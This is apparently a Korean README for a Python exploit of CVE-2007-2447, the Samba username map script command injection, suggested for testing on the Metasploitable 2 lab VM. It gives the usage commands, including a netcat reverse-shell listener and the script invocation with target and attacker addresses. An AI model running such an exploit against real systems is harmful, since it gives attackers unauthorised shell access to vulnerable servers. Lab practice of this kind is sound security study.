
취약한 대상에 리버스 셸을 열기 위해 Samba username map 스크립트 명령 주입을 트리거하는 CVE-2007-2447용 Python 익스플로잇.
스크립트를 테스트하려면 여기에서 제공되는 가상 머신 "metasploitable 2"를 추천합니다. 익스플로잇이 작동하면 스크립트가 리버스 셸을 표시합니다. 연결을 받으려면 netcat 세션을 다음과 같이 열면 됩니다:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
그리고 netcat에서:
netcat -lnvp 1337
결과:
netcat:
alt text
스크립트에서:
alt text
저는 cheat-sheet에서 페이로드를 사용했습니다. 링크는 여기에서 확인할 수 있습니다. 다른 페이로드로 대체할 수 있습니다.